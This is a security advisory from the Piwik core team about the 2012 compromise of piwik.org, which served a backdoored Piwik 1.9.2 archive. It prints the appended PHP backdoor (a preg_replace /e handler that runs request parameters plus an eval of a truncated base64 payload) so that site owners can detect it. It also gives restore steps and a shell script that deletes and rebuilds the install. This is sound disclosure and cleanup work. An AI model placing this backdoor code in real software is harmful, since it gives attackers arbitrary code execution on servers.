Important Security Announcement: the Piwik.org webserver was compromised by an attacker on 2012 Nov 26th; for a few hours the attacker served a Piwik 1.9.2 Zip file with malicious code added to it.

How do I know if my Piwik server is safe?

You are at risk only if you installed or updated to Piwik 1.9.2 on Nov 26th between 15:43 UTC and 23:59 UTC.
If you are not using 1.9.2, or if you updated to 1.9.2 before Nov 26th 15:40 UTC or on Nov 27th or later, you should be safe.

How do I double-check whether my Piwik server is affected?

To check whether your Piwik is affected, open the file piwik/core/Loader.php. A clean file does not contain the code below; a compromised Loader.php has it appended at the end of the file (the long base64 string is shown truncated):

<?php Error_Reporting(0);
if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');
    exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

This appended code is a backdoor: preg_replace() with the /e modifier evaluates the value of the g request parameter as PHP, so anyone who knows the two parameter names can run arbitrary PHP on your server, and the final eval() unpacks and runs a further compressed payload. If you see this malicious code in your piwik/core/Loader.php file, read below to fix the issue.

How do I fix my Piwik if it is compromised?
If your Piwik is compromised, follow these steps:

  1. Backup piwik/config/config.ini.php
  2. DELETE the piwik/ directory
    It is important to DELETE the directory and all piwik files, to ensure any malicious script is deleted as well.
  3. Download latest Piwik from piwik.org
  4. Unzip and Upload the piwik/ directory on your server
  5. Copy the config.ini.php back in /piwik/config/
  6. Open Piwik in your browser; it should display the dashboard as expected

You have now successfully restored Piwik to a clean version.

If other web software runs under the same path on your server, we recommend restoring that software from a backup as well, to be safe.
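The six rebuild steps above as one script, added here as an example and not the project's own tooling: restore_piwik WEBROOT CLEAN_DIR assumes WEBROOT/piwik is the installation to rebuild and CLEAN_DIR is the piwik/ directory you have already unzipped from a freshly downloaded archive into a directory outside the web root (steps 3 and 4; the archive name in the comment is a placeholder). It backs the config up outside the web root before deleting anything, replaces the whole tree, puts the config back, and refuses to declare success if the restored Loader.php still carries a backdoor marker. All paths are assumptions; demo() builds a constructed layout.

```shell
#!/bin/sh
# Added example, not code from the Piwik advisory: the rebuild procedure as a
# function. Assumes CLEAN_DIR was produced beforehand with something like
#   unzip piwik-latest.zip     # archive name is a placeholder
# in a directory outside the web root. All paths below are assumptions.

# restore_piwik WEBROOT CLEAN_DIR: returns 0 on success, 1 on any failure.
restore_piwik() {
    webroot="$1"
    clean="$2"
    target="$webroot/piwik"
    if [ ! -f "$target/config/config.ini.php" ]; then
        echo "no $target/config/config.ini.php to preserve" >&2
        return 1
    fi
    if [ ! -f "$clean/core/Loader.php" ]; then
        echo "$clean does not look like an unpacked piwik/ directory" >&2
        return 1
    fi
    # 1. Back up config.ini.php OUTSIDE the web root, so step 2 cannot remove it.
    backup=$(mktemp -d)
    cp "$target/config/config.ini.php" "$backup/config.ini.php"
    # 2. Delete the whole piwik/ directory, not just Loader.php: anything the
    #    attacker dropped elsewhere in the tree goes with it.
    rm -rf "$target"
    # 3+4. Put the clean, freshly unpacked tree in its place.
    cp -R "$clean" "$target"
    # 5. Put config.ini.php back.
    mkdir -p "$target/config"
    cp "$backup/config.ini.php" "$target/config/config.ini.php"
    rm -rf "$backup"
    # Sanity check before step 6: the restored Loader.php must carry none of the
    # backdoor markers; if it does, the downloaded archive itself is suspect.
    if grep -qF -e 'preg_replace("/(.+)/e"' -e 'lic.log' \
               -e 'eval(gzuncompress(base64_decode(' "$target/core/Loader.php"; then
        echo "restored Loader.php still contains backdoor markers" >&2
        return 1
    fi
    echo "restored $target; step 6: open Piwik and check that the dashboard loads"
    return 0
}

# demo on a constructed layout: a compromised install plus a clean tree.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/web/piwik/core" "$tmp/web/piwik/config" \
             "$tmp/clean/core" "$tmp/clean/config"
    printf 'if (file_exists(dirname(__FILE__)."/lic.log")) exit;\n' \
        > "$tmp/web/piwik/core/Loader.php"
    printf 'dropped by attacker\n' > "$tmp/web/piwik/core/lic.log"
    printf '[database]\nhost = localhost\n' > "$tmp/web/piwik/config/config.ini.php"
    printf '<?php\nclass Piwik_Loader {}\n' > "$tmp/clean/core/Loader.php"
    printf '; shipped defaults\n' > "$tmp/clean/config/global.ini.php"
    restore_piwik "$tmp/web" "$tmp/clean"
    rm -rf "$tmp"
}
demo
```

The order matters: the config copy goes to a temporary directory created by mktemp, never to a sibling path under the web root, so that the rm -rf in step 2 can be done without exceptions, which is what makes the deletion trustworthy.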

How did the attacker get into piwik.org?

The attacker used a security issue in a WordPress plugin we were using and gained partial access to the piwik.org server.

Is there a security bug in Piwik software itself?

The website Piwik.org runs WordPress and was compromised because of a security issue in a WordPress plugin. As far as we know, the Piwik software itself has no exploitable security issue. We have a security bug bounty program in place that rewards researchers for finding security issues in the Piwik software and disclosing them to us. We also document how you can make your own Piwik data safer and secure your server.

Has any sensitive data been leaked?

Piwik is self-hosted, open source software. Piwik.org does not collect any web analytics data from any Piwik user, so no personal or sensitive data has been leaked: there was none to leak.

What we are doing to prevent further issues

We are still working with our system administrators on the issue and have some ideas for making this kind of problem much less likely to recur. We will post a follow-up once these new mechanisms are in place.

Summary

We would like to thank the Piwik users who quickly reported this problem (by email and in the forums). We received more than five reports within two hours, which shows that the Piwik community is vigilant and ready to react to any problem.

We are truly sorry for the inconvenience. Rest assured that we will do our best to keep Piwik (and Piwik.org) a safe place in the future.

Contact us at security@piwik.org if you need more info.


Piwik Core Team
